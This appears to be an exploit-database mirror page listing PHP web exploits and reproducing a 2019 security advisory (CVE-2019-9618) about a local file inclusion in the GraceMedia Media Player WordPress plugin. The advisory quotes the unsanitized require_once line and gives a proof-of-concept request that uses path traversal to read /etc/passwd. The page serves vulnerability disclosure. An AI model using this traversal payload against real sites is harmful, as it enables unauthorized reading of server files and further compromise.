Menu

Improved exploit search engine. Try python and hit enter

"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion"

Author

"Manuel García Cárdenas"

Platform

php

Release date

2019-03-13

Release Date Title Type Platform Author
2019-03-22 "Inout Article Base CMS - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Meeplace Business Review Script - 'id' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Matri4Web Matrimony Website Script - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Bootstrapy CMS - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Placeto CMS Alpha v4 - 'page' SQL Injection" webapps php "Abdullah Çelebi"
2019-03-21 "uHotelBooking System - 'system_page' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "The Company Business Website CMS - Multiple Vulnerabilities" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Netartmedia Vlog System - 'email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia Deals Portal - 'Email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "202CMS v10beta - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-20 "Netartmedia PHP Business Directory 4.2 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Dating Site - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia Jobs Portal 6.1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Real Estate Agency 4.0 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Car Dealer - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia Real Estate Portal 5.0 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia PHP Mall 4.1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia Event Portal 2.0 - 'Email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "eNdonesia Portal 8.7 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-19 "MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting" webapps php 0xB9
2019-03-19 "Gila CMS 1.9.1 - Cross-Site Scripting" webapps php "Ahmet Ümit BAYRAM"
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Moodle 3.4.1 - Remote Code Execution" webapps php "Darryn Ten"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
2019-03-14 "Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution" webapps php R3zk0n
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
Release Date Title Type Platform Author
2019-03-13 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2018-09-19 "WordPress Plugin Localize My Post 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2018-09-19 "WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2018-06-11 "WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2018-04-18 "Kodi 17.6 - Persistent Cross-Site Scripting" webapps multiple "Manuel García Cárdenas"
2018-03-12 "TextPattern 4.6.2 - 'qty' SQL Injection" webapps php "Manuel García Cárdenas"
2017-04-11 "WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2016-04-26 "ImpressCMS 1.3.9 - SQL Injection" webapps php "Manuel García Cárdenas"
2016-02-04 "UliCMS v9.8.1 - SQL Injection" webapps php "Manuel García Cárdenas"
2013-06-03 "Telaen - Information Disclosure" webapps php "Manuel García Cárdenas"
2013-06-04 "Telaen 2.7.x - Open Redirection" webapps php "Manuel García Cárdenas"
2013-06-04 "Telaen 2.7.x - Cross-Site Scripting" webapps php "Manuel García Cárdenas"
2015-10-06 "PHP-Fusion 7.02.07 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2013-03-10 "Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting" webapps php "Manuel García Cárdenas"
2014-11-17 "Zoph 0.9.1 - Multiple Vulnerabilities" webapps php "Manuel García Cárdenas"
2014-11-17 "WebsiteBaker 2.8.3 - Multiple Vulnerabilities" webapps php "Manuel García Cárdenas"
2014-11-13 "Piwigo 2.6.0 - 'picture.php?rate' SQL Injection" webapps php "Manuel García Cárdenas"
2013-09-30 "XAMPP 1.8.1 - 'lang.php?WriteIntoLocalDisk method' Local Write Access" webapps php "Manuel García Cárdenas"
2016-09-22 "Exponent CMS 2.3.9 - Blind SQL Injection" webapps php "Manuel García Cárdenas"
2017-12-15 "Sync Breeze 10.2.12 - Denial of Service" dos windows "Manuel García Cárdenas"
2018-01-12 "PyroBatchFTP < 3.19 - Buffer Overflow" dos windows "Manuel García Cárdenas"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46537/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

II. BACKGROUND
-------------------------
Hassle-free and user-friendly way to add a Media player directly to your
website.

III. DESCRIPTION
-------------------------
This bug was found in the file:

/gracemedia-media-player/templates/files/ajax_controller.php

Vulnerable code:

require_once($_GET['cfg']);

The parameter "cfg" it is not sanitized allowing include local files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed that is vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
GraceMedia Media Player <= 1.0

VII. SOLUTION
-------------------------
Disable plugin until a fix is available, vendor does not fix after 2
requests.

VIII. REFERENCES
-------------------------
https://es.wordpress.org/plugins/gracemedia-media-player/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
February 06, 2019 1: Initial release
March 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2019 2: Email to vendor without response
February 21, 2019 3: Second email to vendor without response
March 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester